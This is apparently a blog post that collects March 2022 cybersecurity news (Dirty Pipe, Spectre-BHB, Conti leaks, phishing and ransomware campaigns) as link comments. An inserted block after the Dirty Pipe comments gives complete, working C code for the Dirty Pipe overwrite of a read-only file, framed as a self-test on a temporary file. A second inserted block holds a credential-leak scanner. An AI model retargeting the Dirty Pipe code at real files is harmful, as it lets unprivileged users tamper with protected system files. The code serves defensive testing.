Cyber security news March 2022

This posting is here to collect cyber security news in March 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

888 Comments

  1. Tomi Engdahl says:

    “Dirty Pipe” Linux kernel bug lets anyone write to any file
    https://nakedsecurity.sophos.com/2022/03/08/dirty-pipe-linux-kernel-bug-lets-anyone-to-write-to-any-file/

    Very greatly simplified, if you have a pipe that you are allowed to write to and a file that you aren’t…

    …then, sometimes, writing into the pipe’s memory buffer may inadvertently also modify the kernel’s temporary in-memory copies – the so-called cache pages – of various parts of the disk file.

    Annoyingly, even if the file is flagged as “read only” by the operating system itself, modifying its underlying kernel cache is treated as a “write”.

    As a result, the modified cache buffer is flushed back to disk by the kernel, permanently updating the contents of the stored file, despite any operating system permissions applied to it.

    Even a physically unwritable file, such as one on a CD-ROM or an SD card with the write-enable switch turned off, will appear to have been modified for as long as the corrupted cache buffers are kept in memory by the kernel.

    Which versions are affected?
    For those running Linux who want to cut to the chase and check if they’re patched, Kellermann reports that this bug was introduced (at least in its current, easily exploitable form) in kernel 5.8.

    That means three officially supported kernel flavours are definitely at risk: 5.10, 5.15 and 5.16.

    The bug was patched in 5.10.102, 5.15.25 and 5.16.11, so if you have a version that is at or above one of those, you’re OK.

    Apparently, Android is affected too, and although a fix for the vulnerability was incorporated into the kernel source code on 2022-02-24, neither Google’s Android Security Bulletin for March 2022, nor the company’s Pixel-specific notes, mention this bug, now dubbed CVE-2022-0847.

    Of all the numerous officially supported Android handsets we’ve surveyed so far, the only ones we heard of that use kernel 5.10 are the Google Pixel 6 and the Samsung S22 series (reports suggest both of these are still on 5.10.43 [2022-03-09T12:00Z]).

    Most devices seem still to be using one of the older-but-apparently-not-vulnerable Linux 5.4 or 4.x versions.

    Intriguingly, Kellermann discovered the vulnerability due to intermittent corruption of HTTP log files on his company’s network.

    He had a server process that would regularly take daily logfiles, compressed using the Unix-friendly gzip utility, and convert them into monthly logfiles in the Windows-friendly ZIP format for customers to download.

    With perseverance, he was able to create two minimalist programs, with just three and five lines of code respectively, that reproduced the misbehaviour in a way that could only be blamed on the kernel.

    Following that, he was able to construct a proof-of-concept attack that allows an unprivileged user to modify even a well-locked-down file such as your list of trusted SSH keys, or the list of “known good” digital signatures you’re willing to connect to for updates.

    Reply
  2. Tomi Engdahl says:

    Internet backbone provider Lumen quits Russia
    Disconnects small group of customers to protect ‘integrity of the global internet’
    https://www.theregister.com/2022/03/09/lumen_quits_russia/

    Lumen Technologies, the internet backbone provider formerly known as CenturyLink, has quit Russia.

    The biz’s announcement is titled, “Lumen’s readiness to meet global events,” and does not take a position on the morality of the illegal invasion of Ukraine. Instead, it frames the decision as necessary “due to increased security risk inside Russia” and “to ensure the security of our and our customers’ networks, as well as the ongoing integrity of the global internet.”

    Those are rather different reasons to those expressed by fellow backbone provider Cogent, which made opposition to the invasion its main reason for cutting off Russian customers.

    Lumen has also admitted that the sole physical link it controls in Russia is not material to its business, and it serves an “extremely small number of enterprise customers” in the nation.

    It is, however, taking steps to shut down its Russian operations “from a legal and regulatory standpoint as well as taking other steps for exiting the business in region.”

    The company also serves some customers in Ukraine, and has pledged to abide by the West’s sanctions against Moscow as required.

    While Lumen’s rationale for leaving Russia lacks the ideological aspect behind others’ similar decisions, it further isolates Russia from the global community

    Russia has already introduced new legislation that makes mentioning the invasion in the media an offense – only the false term “special military action” is allowed – and is also cracking down on the limited demonstrations protesting such matters that have taken place within its borders.

    Other tech-related entities to quit Russia include global consultancies, Visa and Mastercard, and software vendors Oracle and SAP.

    Reply
  3. Tomi Engdahl says:

    Where are the (serious) Russian cyberattacks?
    Sure, HermeticWiper and IsaacWiper are bad, but they’re not BAD in capital letters
    https://www.theregister.com/2022/03/09/where_are_the_russian_cyberattacks/

    I’m heartsick over Russia’s invasion of Ukraine. But, before it began, I’d been really worried about Russian cyberattacks, which would overrun Ukraine and flood into the West’s infrastructure.

    I foresaw the Russian GRU Sandworm hacking group launching a cyber attack that would ruin the European Union’s power grid or wreck major US internet sites such as Google, Facebook, and Microsoft – or stop cellular services in their tracks.

    I was wrong. So far, anyway.

    Oh certainly HermeticWiper and IsaacWiper – which will wipe all your data and your software and operating system for good measure – will ruin your day, but even together neither will make whole companies or countries miserable. And, to no-one’s surprise Russia and its puppets have launched Distributed Denial of Service (DDoS) attacks on Ukrainian sites.

    But, where are those massive attacks? Why is Ukraine’s electrical system still up and running – except for damaged nuclear reactors? Why, instead of shutting down Ukraine’s TV networks with cyber attacks, did they have to blow up a Kyiv TV tower? Did we just let paranoia overrule our common sense?

    It’s clear that Putin thought he’d easily overrun Ukraine. He was wrong.

    Reply
  4. Tomi Engdahl says:

    Google Blocks Chinese Phishing Campaign Targeting U.S. Government
    https://www.securityweek.com/google-blocks-chinese-phishing-campaign-targeting-us-government

    Google says it has blocked a phishing campaign originating from China and aimed at Gmail users associated with the U.S. government.

    The attacks, Google Threat Analysis Group (TAG) director Shane Huntley said on Tuesday, happened in February and were completely blocked. According to him, TAG has no evidence that these attacks are related to the war in Ukraine.

    “In February, we detected an APT31 phishing campaign targeting high profile Gmail users affiliated with the U.S. government. 100% of these emails were automatically classified as spam and blocked by Gmail,” Huntley said.

    Also tracked as Zirconium, Judgment Panda, and Red Keres, the Chinese hacking group is known for the targeting of entities in the United States, Canada, and various European countries, including Belarus, Finland, and France. Last year, the group also targeted Russia.

    Reply
  5. Tomi Engdahl says:

    Intel, AMD, Arm warn of new speculative execution CPU bugs
    https://www.bleepingcomputer.com/news/security/intel-amd-arm-warn-of-new-speculative-execution-cpu-bugs/
    Security researchers have found a new way to bypass existing hardware-based defenses for speculative execution in modern computer processors from Intel, AMD, and Arm. Today, the three CPU manufacturers have published advisories accompanied by mitigation updates and security recommendations to tackle recently discovered issues that allow leaking of sensitive information despite isolation-based protections.
    See also:
    https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/branch-history-injection.html
    https://www.amd.com/system/files/documents/software-techniques-for-managing-speculation.pdf
    https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability/spectre-bhb

    Reply
  6. Tomi Engdahl says:

    Russian government sites hacked in supply chain attack https://www.bleepingcomputer.com/news/security/russian-government-sites-hacked-in-supply-chain-attack/
    Russia says some of its federal agencies’ websites were compromised in a supply chain attack on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies. The list of sites impacted in the attack includes the websites of the Energy Ministry, the Federal State Statistics Service, the Federal Penitentiary Service, the Federal Bailiff Service, the Federal Antimonopoly Service, the Culture Ministry, and other Russian state agencies. The incident was discovered Tuesday evening after the attackers published their own content and blocked access to the websites.

    Reply
  7. Tomi Engdahl says:

    Pharmacy scammers are now preying on the elderly: warn your loved ones
    https://www.iltalehti.fi/tietoturva/a/3ab57809-b1d5-4fbd-8606-d471cf45bf53
    Scam e-mails are circulating in the name of the Avainapteekit pharmacy chain, trying to phish Finns’ personal data or swindle money.
    The scam messages look genuine and are formatted to resemble Avainapteekit’s real newsletters. The messages try to get the recipient to open a link to a scam site that phishes for personal details and credit card information. Handing over the data can lead to financial losses, for example in the form of subscription scams, or at worst to identity theft.

    Reply
  8. Tomi Engdahl says:

    Exploit chain allows security researchers to pwn phone system https://portswigger.net/daily-swig/exploit-chain-allows-security-researchers-to-pwn-phone-system
    Security researchers have been able to chain together three separate vulnerabilities to achieve the complete compromise of Pascom’s Cloud Phone System. Full pre-authenticated remote code execution (RCE) on the business-focused Voice over IP (VoIP) and more general communication platform was achieved by Daniel Eshetu of Ethiopian infosec firm Kerbit by combining a trio of less serious security flaws. For its part, Pascom said it wanted to “thank KerbitSec for the quick and effective cooperation in ensuring we closed these vulnerabilities!”. See also: https://kerbit.io/research/read/blog/4

    Reply
  9. Tomi Engdahl says:

    New Nokoyawa Ransomware Possibly Related to Hive https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html
    Hive, which is one of the more notable ransomware families of 2021, made waves in the latter half of the year after breaching over 300 organizations in just four months allowing the group to earn what could potentially be millions of US dollars in profit. In March 2022, we came across evidence that another, relatively unknown, ransomware known as Nokoyawa is likely connected with Hive, as the two families share some striking similarities in their attack chain, from the tools used to the order in which they execute various steps. Currently, the majority of Nokoyawa’s targets are located in South America, primarily in Argentina.

    Reply
  10. Tomi Engdahl says:

    Hackers fork open-source reverse tunneling tool for persistence https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/
    Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups. Although no concrete connection between groups has been uncovered, the operational tactics, targeting scope, and malware customization capabilities signify a potential connection. See also:
    https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

    You compromised a Windows / Linux / Mac server during your external audit. This server is located inside a LAN network and you want to establish connections to other machines on this network.
    Ligolo can setup a tunnel to access internal server’s resources.

    Reply
  11. Tomi Engdahl says:

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/
    In February 2021, Google announced Autopilot, a new mode of operation in Google Kubernetes Engine (GKE). With Autopilot, Google provides a “hands-off” Kubernetes experience, managing cluster infrastructure for the customer. The platform automatically provisions and removes nodes based on resource consumption and enforces secure Kubernetes best practices out of the box. In June 2021, Unit 42 researchers disclosed several vulnerabilities and attack techniques in GKE Autopilot to Google. Users able to create a pod could have abused these to (1) escape their pod and compromise the underlying node, (2) escalate privileges and become full cluster administrators, and (3) covertly persist administrative access through backdoors that are completely invisible to cluster operators. An attacker who obtained an initial foothold on an Autopilot cluster, for example, through a compromised developer’s account, could have exploited these issues to escalate privileges and become a “shadow administrator,” with the ability to covertly exfiltrate secrets, deploy malware or cryptominers and disrupt workloads.

    Reply
  12. Tomi Engdahl says:

    Attackers exploit fundamental flaw in the web’s security to steal $2 million in cryptocurrency https://freedom-to-tinker.com/2022/03/09/attackers-exploit-fundamental-flaw-in-the-webs-security-to-steal-2-million-in-cryptocurrency/
    On Thursday, Feb. 3, 2022, attackers stole approximately $2 million worth of cryptocurrency from users of the Korean crypto exchange KLAYswap. This theft exploited systemic vulnerabilities in the Internet’s routing ecosystem and in the Public Key Infrastructure (PKI), leaving the Internet’s most sensitive financial, medical and other websites vulnerable to attack. Attackers exploited a technique known as a Border Gateway Protocol (BGP) hijack to launch this attack.
    What is unprecedented in this attack (to our knowledge) is the complete bypassing of the cryptographic protections offered by the TLS protocol. Using its BGP hijack, the adversary first targeted the PKI and launched a man-in-the-middle attack on the certificate distribution process. Only after it had acquired a valid digital certificate for the target domain did it aim its attack towards real users by serving its malicious javascript file over an encrypted connection.

    Reply
  13. Tomi Engdahl says:

    Hole in the Linux kernel: even new smartphones at risk
    https://etn.fi/index.php/13-news/13285-linux-ytimessae-aukko-uudetkin-aelypuhelimet-vaarassa

    The Linux kernel is developed by the world’s largest group of open-source developers. The code always has things to fix, but only rarely actual vulnerabilities that pose risks to the system. Those turn up too, however. One example is the vulnerability named Dirty Pipe.

    Security researcher Max Kellermann of the hosting company CM4all ran into the bug when corrupted files started appearing on a customer’s Linux machine. Kellermann spent months investigating every possible reason why corrupted files were appearing in the page-request log files. In the end the cause turned out to be a vulnerability in the Linux kernel.

    The vulnerability appeared in the Linux kernel in version 5.8, which was released in August 2020. It has been fixed with the release of versions 5.16.11, 5.15.25 and 5.10.102. The vulnerability is also present in all Android versions that are based on the 5.8 kernel. One example is Samsung’s new Galaxy S22 series, whose Android 12 operating system is based on Linux version 5.10.43.

    Dirty Pipe is caused by an uninitialized variable, with which an attacker can overwrite the contents of any file that is in the page cache. Dirty Pipe can do this even if the file is not writable.

    Reply
  14. Tomi Engdahl says:

    The Dirty Pipe Vulnerability
    https://dirtypipe.cm4all.com/

    This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

    Reply
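Added example, tying together comments 1, 13 and 14 above. This is not code from the Sophos or ETN articles nor from Kellermann’s write-up: a small C program that first classifies the running kernel’s release string against the fixed versions named in those comments, then performs the Dirty Pipe sequence the Sophos piece describes (fill and drain a pipe, splice one byte of a read-only file into it, write through the pipe) against a read-only temporary file the program itself creates, and reports whether the page cache was modified. The temp file path, its sample content and the injected bytes are constructed for this example; it is Linux-only (splice, F_GETPIPE_SZ).

```c
/* Added example: CVE-2022-0847 (Dirty Pipe) self-test. Not code from the
 * articles above or from Kellermann's write-up; the temp file, its content
 * and the payload are constructed here. Linux-only (splice, F_GETPIPE_SZ). */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <unistd.h>

/* Version heuristic from the fixed releases named above: bug present since
 * 5.8, fixed in 5.10.102, 5.15.25, 5.16.11 and everything from 5.17 on.
 * Returns 1 = vulnerable by version, 0 = not, -1 = unparsable. Distros
 * backport fixes without changing the version string, so treat this as a
 * hint and rely on the runtime probe below for the real answer. */
int release_looks_vulnerable(const char *release)
{
    int maj = 0, min = 0, pat = 0;
    if (sscanf(release, "%d.%d.%d", &maj, &min, &pat) < 2)
        return -1;
    if (maj < 5 || (maj == 5 && min < 8))
        return 0;                    /* predates the bug */
    if (maj > 5 || min >= 17)
        return 0;                    /* 5.17+ shipped with the fix */
    switch (min) {
    case 10: return pat < 102;
    case 15: return pat < 25;
    case 16: return pat < 11;
    default: return 1;               /* 5.8, 5.9, 5.11-5.14: EOL, never fixed */
    }
}

/* Runtime probe. Returns 1 if a write through a pipe landed in the page
 * cache of a file opened read-only (vulnerable), 0 if it did not (patched),
 * -1 if setup failed (e.g. splice() refused by a sandbox). Only touches a
 * temp file it creates and removes itself. */
int dirty_pipe_probe(void)
{
    static const char original[] = "AAAAAAAAAAAAAAAA";  /* constructed content */
    static const char payload[] = "BBBB";               /* bytes we try to inject */
    char path[] = "/tmp/dirtypipe-probe-XXXXXX";
    char buf[sizeof original] = {0};
    char *junk = NULL;
    int result = -1, fd = -1, ro = -1, check = -1, p[2] = {-1, -1};
    int pipe_size;
    loff_t off = 0;
    ssize_t n;

    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, original, sizeof original - 1) != (ssize_t)(sizeof original - 1))
        goto out;
    fchmod(fd, 0444);               /* read-only, like the article's targets */
    close(fd);
    fd = -1;

    ro = open(path, O_RDONLY);      /* the only descriptor on the file: read-only */
    if (ro < 0 || pipe(p) < 0)
        goto out;

    /* Step 1: fill the pipe completely, then drain it. On an unpatched kernel
     * every ring slot now carries a stale PIPE_BUF_FLAG_CAN_MERGE, because
     * nothing clears the flag when splice() later reuses the slot. */
    pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    if (pipe_size <= 0 || (junk = malloc(pipe_size)) == NULL)
        goto out;
    memset(junk, 'x', pipe_size);
    if (write(p[1], junk, pipe_size) != pipe_size || read(p[0], junk, pipe_size) != pipe_size)
        goto out;

    /* Step 2: splice one byte of the file into the pipe. The slot now points
     * straight at the file's page-cache page (offset 0, length 1). */
    if (splice(ro, &off, p[1], NULL, 1, 0) != 1)
        goto out;

    /* Step 3: an ordinary write to the pipe. With the stale CAN_MERGE flag the
     * kernel appends into that cached page at offset 1, i.e. into the file. */
    if (write(p[1], payload, sizeof payload - 1) != (ssize_t)(sizeof payload - 1))
        goto out;

    /* Read the file back through the page cache via a fresh descriptor. */
    check = open(path, O_RDONLY);
    if (check < 0)
        goto out;
    n = read(check, buf, sizeof buf - 1);
    result = (n >= 5 && memcmp(buf + 1, payload, sizeof payload - 1) == 0) ? 1 : 0;
out:
    free(junk);
    if (fd >= 0) close(fd);
    if (ro >= 0) close(ro);
    if (check >= 0) close(check);
    if (p[0] >= 0) close(p[0]);
    if (p[1] >= 0) close(p[1]);
    unlink(path);
    return result;
}

int main(void)
{
    struct utsname u;
    if (uname(&u) == 0)
        printf("kernel %s: by version %s\n", u.release,
               release_looks_vulnerable(u.release) == 1 ? "VULNERABLE" : "not affected / unknown");
    int r = dirty_pipe_probe();
    printf("runtime probe: %s\n", r == 1 ? "VULNERABLE (page cache modified)"
                                 : r == 0 ? "not vulnerable" : "probe could not run");
    return r == 1;
}
```

On a fixed kernel the probe returns 0 and the file keeps its original bytes; on an unpatched 5.8+ kernel it returns 1 even though the file is mode 0444 and was never opened for writing, which is exactly the point of the bug. The probe only ever touches a file owned by the current user, but it is still the real write primitive, so do not retarget it at anything else.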
  15. Tomi Engdahl says:

    The war in Ukraine has boosted the spread of malware
    https://www.uusiteknologia.fi/2022/03/10/ukrainan-sota-vahvisti-haittaohjelmien-yleistymista/

    According to the US company Check Point Research, the world’s most common malware in February was Emotet, which has gained extra momentum from malicious e-mail attachments about the war in Ukraine. Finland’s most common cyber nuisance was still the ransomware Netwalker.

    According to Check Point Research (CPR), the research arm of security company Check Point, Emotet is still the most common malware, affecting five percent of organizations worldwide. By contrast, another malware, Trickbot, has dropped to sixth place on the top-10 list.

    In 2021 Trickbot reached the top of the most common malware list seven times.

    https://blog.checkpoint.com/2022/03/09/february-2022s-most-wanted-malware-emotet-remains-number-one-while-trickbot-slips-even-further-down-the-index/

    Reply
  16. Tomi Engdahl says:

    Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/
    Be careful when downloading a tool to cyber-target Russia: It could be an infostealer wolf dressed in sheep’s clothing that grabs your cryptocurrency info instead. See also:
    https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html

    Reply
  17. Tomi Engdahl says:

    Russia creates its own TLS certificate authority to bypass sanctions https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/
    Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. However, for new Certificate Authorities (CA) to be trusted by web browsers, they first needed to be vetted by various companies, which can take a long time. Currently, the only web browsers that recognize Russia’s new CA as trustworthy are the Russia-based Yandex browser and Atom products, so Russian users are told to use these instead of Chrome, Firefox, Edge, etc.

    Reply
  18. Tomi Engdahl says:

    Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up Sort Of https://research.checkpoint.com/2022/leaks-of-conti-ransomware-group-paint-picture-of-a-surprisingly-normal-tech-start-up-sort-of/
    Conti’s structure is almost a classic organizational hierarchy, with team leaders who report to upper management, but to their credit there are many instances of different groups working with each other directly (this is called “horizontal information flow”, and is a Good Thing and a sign of organizational health, as any steeple-handed thinkfluencer will happily tell you). See also:
    https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

    Reply
  19. Tomi Engdahl says:

    Middleboxes now being used for DDoS attacks in the wild, Akamai finds https://portswigger.net/daily-swig/middleboxes-now-being-used-for-ddos-attacks-in-the-wild-akamai-finds
    In 2021, researchers warned about a new kind of DDoS attack that took advantage of network middleboxes to carry out reflection amplification on the TCP protocol. Last week, Akamai reported the first wave of TCP middlebox reflection DDoS attacks in the wild. Akamai’s findings show that malicious actors are starting to add TCP middlebox reflection to their arsenal and possibly honing it for larger attacks in the future.

    Reply
  20. Tomi Engdahl says:

    Credentials Leaks on VirusTotal
    https://isc.sans.edu/diary/rss/28426
    A few weeks ago, researchers published some information about stolen credentials that were posted on VirusTotal. I’m keeping an eye on VT for my customers and searching for data related to them. For example, I look for their domain name(s) inside files posted on VT. I can confirm what researchers said: there are a lot of password leaks shared on VTI, but yesterday there was a peak of files uploaded on this platform.

    Reply
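An added example, not from the SANS diary, of the kind of local filter you would run over a file pulled from VirusTotal to see whether it holds credentials for domains you look after. The dump lines and the monitored domains are constructed for this example; the format assumed is one “e-mail:password” (or “e-mail;password”) pair per line, which is what most of these leak files look like, and anything else is ignored. Subdomains of a monitored domain match, but look-alikes such as notexample.com do not.

```c
/* Added example, not from the SANS diary: a local filter for files pulled
 * from VirusTotal that reports which lines hold credentials for domains you
 * monitor. SAMPLE_DUMP and MONITORED are constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed stand-in for a leaked "email:password" file. */
const char SAMPLE_DUMP[] =
    "alice@example.com:Winter2022!\n"
    "bob@mail.EXAMPLE.com;hunter2\n"
    "carol@notexample.com:pass123\n"
    "dave@gmail.com:qwerty\n"
    "eve@corp.example.org:letmein\r\n"
    "this line has no address at all\n"
    "frank@example.comfort.net:x\n";

/* Domains we look after (assumed); their subdomains match too. */
const char *const MONITORED[] = { "example.com", "corp.example.org" };
const int N_MONITORED = 2;

/* Case-insensitive: host equals dom, or host ends with "." dom.
 * The dot check is what stops "notexample.com" matching "example.com". */
static int domain_matches(const char *host, size_t hlen, const char *dom)
{
    size_t dlen = strlen(dom);
    if (hlen < dlen)
        return 0;
    const char *tail = host + (hlen - dlen);
    if (hlen > dlen && tail[-1] != '.')
        return 0;
    return strncasecmp(tail, dom, dlen) == 0;
}

/* Walks dump line by line, takes the host part between the first '@' and
 * the ':' or ';' separator, and records the 0-based index of each line
 * whose domain is monitored. Returns the total number of matching lines;
 * only the first max_hits indexes are stored in hits[]. */
int scan_dump(const char *dump, const char *const *domains, int ndomains,
              int *hits, int max_hits)
{
    int count = 0;
    const char *line = dump;
    for (int idx = 0; *line != '\0'; idx++) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        if (len && line[len - 1] == '\r')
            len--;                                   /* tolerate CRLF dumps */
        const char *at = memchr(line, '@', len);
        if (at) {
            const char *host = at + 1;
            const char *sep = host;
            while (sep < line + len && *sep != ':' && *sep != ';')
                sep++;
            for (int d = 0; d < ndomains; d++) {
                if (domain_matches(host, (size_t)(sep - host), domains[d])) {
                    if (count < max_hits)
                        hits[count] = idx;
                    count++;
                    break;
                }
            }
        }
        if (!nl)
            break;
        line = nl + 1;
    }
    return count;
}

int main(void)
{
    int hits[16];
    int n = scan_dump(SAMPLE_DUMP, MONITORED, N_MONITORED, hits, 16);
    printf("%d monitored-domain credential line(s), at index(es):", n);
    for (int i = 0; i < n && i < 16; i++)
        printf(" %d", hits[i]);
    printf("\n");
    return 0;
}
```

Against the constructed dump this flags lines 0, 1 and 4 (alice, bob on a subdomain with different case, eve on the second monitored domain) and correctly ignores the look-alike domains. In practice you would feed it each file VirusTotal returns for your domain query and treat any hit as a forced password reset.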
  21. Tomi Engdahl says:

    New Variant of Spectre Attack Bypasses Intel and Arm Hardware Mitigations
    https://www.securityweek.com/new-variant-spectre-attack-bypasses-intel-and-arm-hardware-mitigations

    A team of researchers from the Vrije Universiteit Amsterdam in the Netherlands has demonstrated a new Spectre attack variant that can bypass hardware mitigations implemented in recent years by Intel and Arm.

    Since the disclosure of the Spectre and Meltdown vulnerabilities back in January 2018, researchers have continued looking into the security of processors and they have found several other side-channel attack methods. These methods can typically allow an attacker with local access to the targeted machine to obtain small bits of potentially sensitive data from memory.

    When the Spectre vulnerability was found, the most dangerous variant was called Spectre v2 or Spectre BTI (Branch Target Injection). Affected CPU makers, such as Intel and Arm, have been developing hardware mitigations to prevent these types of exploits.

    However, VU Amsterdam researchers this week disclosed the details of what they have described as an “extension of Spectre v2.” The new variant, dubbed Branch History Injection (BHI) and Spectre-BHB, bypasses those hardware mitigations. Another slightly different variant uncovered by the researchers is called Intra-mode BTI (IMBTI).

    “The mitigations [implemented by Intel and Arm] work as intended, but the residual attack surface is much more significant than vendors originally assumed,” the researchers explained.

    They demonstrated their findings by creating what they described as a “neat end-to-end exploit leaking arbitrary kernel memory on modern Intel CPUs.” They have also released a video showing the exploit in action.

    Reply
  22. Tomi Engdahl says:

    Vodafone Investigating Source Code Theft Claims
    https://www.securityweek.com/vodafone-investigating-source-code-theft-claims

    Vodafone has launched an investigation after a cybercrime group claimed to have stolen hundreds of gigabytes of source code from the telecoms giant.

    The hacker group, calling itself “Lapsus$,” claims to have obtained roughly 200 Gb of source code files, allegedly representing approximately 5,000 GitHub repositories.

    In an emailed statement, Vodafone confirmed that it’s aware of the claims and said an investigation has been launched.

    “We are investigating the claim together with law enforcement, and at this point we cannot comment on the credibility of the claim,” Vodafone told SecurityWeek. “However, what we can say is that generally the types of repositories referenced in the claim contain proprietary source code and do not contain customer data.”

    Reply
  23. Tomi Engdahl says:

    1Password Increases Top Bug Bounty Reward to $1 Million
    https://www.securityweek.com/1password-increases-top-bug-bounty-reward-1-million

    Password management software vendor 1Password today announced that it is willing to pay up to $1 million to researchers able to steal secrets from its vault.

    The top reward is offered as part of the company’s bug bounty program that has been running on Bugcrowd for years.

    Since 2017, the top reward offered through the bug bounty program has been $100,000. Despite hundreds of attempts, however, no researcher has claimed it so far.

    Over the past four years, 1Password paid out $103,000 in bug bounty rewards to participating researchers. To date, a total of 115 payouts were handed out via Bugcrowd, at an average of $900 per reward, but only for minor vulnerabilities.

    The newly announced $1 million reward is expected to attract more researchers to the bug bounty program and help 1Password further improve the security of its products.

    Researchers looking to earn the $1 million reward need to break into a white box testing account to retrieve a flag – a note that contains bad poetry.

    Reply
  24. Tomi Engdahl says:

    U.S. Warns of Conti Ransomware Attacks as Gang Deals With Leak Fallout
    https://www.securityweek.com/us-warns-conti-ransomware-attacks-gang-deals-leak-fallout

    The U.S. government has reissued an alert warning organizations about Conti ransomware attacks as the cybercrime group deals with the recent leaks.

    An alert originally released in September 2021 was reissued recently by CISA, FBI, NSA and the U.S. Secret Service. The alert contains technical details on Conti attacks, as well as indicators of compromise (IoCs) that can be useful to defenders.

    Shortly after Russia launched an invasion of Ukraine, the Conti group announced its support for Russia, threatening to attack the critical infrastructure of “enemies.” They later revised their statement to say that they condemned the war, but the threat to launch cyber operations in response to the West’s actions remained.

    A few days after Conti made the announcement, an individual — a Ukrainian security researcher or possibly a rogue member of the Conti group — started leaking files related to the gang’s operations. The leaks started with some chat logs on February 27 and continued with other files, including Conti ransomware source code, on March 1.

    The U.S. government said in its updated alert that the Conti threat actors appeared to remain active, with its victim count rising to more than 1,000.

    MDR company eSentire this week reported that the Conti group announced attacks against more than 50 organizations between November 27, 2021, and February 28, 2022.

    Reply
  25. Tomi Engdahl says:

    Teboil’s website carries a scary notice: this is what it is about https://www.is.fi/digitoday/tietoturva/art-2000008674882.html

    Reply
  26. Tomi Engdahl says:

    Google: Russian Hackers Target Ukrainians, European Allies via Phishing Attacks
    https://thehackernews.com/2022/03/google-russian-hackers-target.html?m=1

    A broad range of threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched phishing campaigns against Ukraine, Poland, and other European entities amid Russia’s invasion of Ukraine.

    Google’s Threat Analysis Group (TAG) said it took down two Blogspot domains that were used by the nation-state group FancyBear (aka APT28) – which is attributed to Russia’s GRU military intelligence – as a landing page for its social engineering attacks.

    The disclosure comes close on the heels of an advisory from the Computer Emergency Response Team of Ukraine (CERT-UA) warning of phishing campaigns targeting Ukr.net users that involve sending messages from compromised accounts containing links to attacker-controlled credential harvesting pages.

    Reply
  27. Tomi Engdahl says:

    UPS flaws allow for remote code execution and remote fire-based interruptions
    Hooking up uninterruptible power supplies with TLS implementation errors automatically to a cloud service could potentially lead to a burning sensation
    https://www.zdnet.com/article/ups-flaws-allow-for-remote-code-execution-and-remote-fire-based-interruptions/

    Reply
  28. Tomi Engdahl says:

    In-the-wild DDoS attack can be launched from a single packet to create terabytes of traffic
    A test mode that shouldn’t be exposed to the internet from a PBX-to-internet gateway is responsible for an amplification ratio of 4,294,967,296 to 1.
    https://www.zdnet.com/article/in-the-wild-ddos-attack-can-be-launched-from-a-single-packet-to-create-terabytes-of-traffic/

    Reply
  29. Tomi Engdahl says:

    Why You Should Be Using CISA’s Catalog of Exploited Vulns
    It’s a great starting point for organizations that want to ride the wave of risk-based vulnerability management rather than drowning beneath it.
    https://www.darkreading.com/vulnerabilities-threats/why-you-should-be-using-cisa-s-catalog-of-exploited-vulns

    Reply
  30. Tomi Engdahl says:

    Millions of APC Smart-UPS devices vulnerable to TLStorm
    Critical vulns spotted in popular Schneider kit
    https://www.theregister.com/2022/03/09/tlstorm_apc_ups_critical_zero_days/

    Reply
  31. Tomi Engdahl says:

    Russia Is Preparing to Cut Itself Off From the Global Internet
    The Kremlin is getting ready to bring down the digital Iron Curtain.
    https://www.vice.com/en/article/88gevb/russia-is-preparing-to-cut-itself-off-from-the-global-internet

    Reply
  32. Tomi Engdahl says:

    APT41 Spies Broke Into 6 US State Networks via a Livestock App
    https://threatpost.com/apt41-spies-broke-into-6-us-state-networks-via-livestock-app/178838/

    The China-affiliated state-sponsored threat actor used Log4j and zero-day bugs in the USAHerds animal-tracking software to hack into multiple government networks.

    USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.

    Reply
  33. Tomi Engdahl says:

    US critical infrastructure hit by ransomware
    A ransomware variant has hit at least 52 critical national infrastructure firms in the US
    https://www.itsecurityguru.org/2022/03/09/us-critical-infrastructure-hit-by-ransomware/

    Reply
